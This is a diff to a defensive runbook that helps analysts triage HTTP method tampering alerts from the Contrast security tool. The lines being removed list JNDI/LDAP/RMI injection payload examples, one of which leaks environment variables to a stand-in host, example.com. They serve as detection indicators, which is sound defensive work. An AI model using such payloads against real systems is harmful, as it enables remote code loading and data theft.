kaji-m/adr-runbooks/_runbooks/HTTP Method Tampering RunBook.md

 ## Exploited

-An "Exploited" outcome means Contrast detected an input coming into an application that is then used to create a JNDI Query with the protocol RMI or LDAP.
+"Exploited" means Contrast detected an abnormal HTTP method used in an incoming request, and the response code was not a 501 or 405 indicating the request was processed.

 To verify this is a true positive, review the following attributes of the event for common indicators:

-- An unknown LDAP or RMI Server.

-\
-Examples:

-- `jndi:ldap://example.com:1389/jdk8`
-- `jndi:rmi://example.com:1389/jdk8`
-- `jndi:ldap://${env:USER}.${env:USERNAME}.example.com:1389/`
+- Does the request contain an abnormal HTTP method? (e.g one that is not defined in the HTTP RFC)
+- Is the HTTP response code not a 501 or 405?
+- Does the HTTP method make sense in the context of the application? (e.g a DELETE request to a static resource)

 \
 Does the event appear to be a true positive? (click to proceed)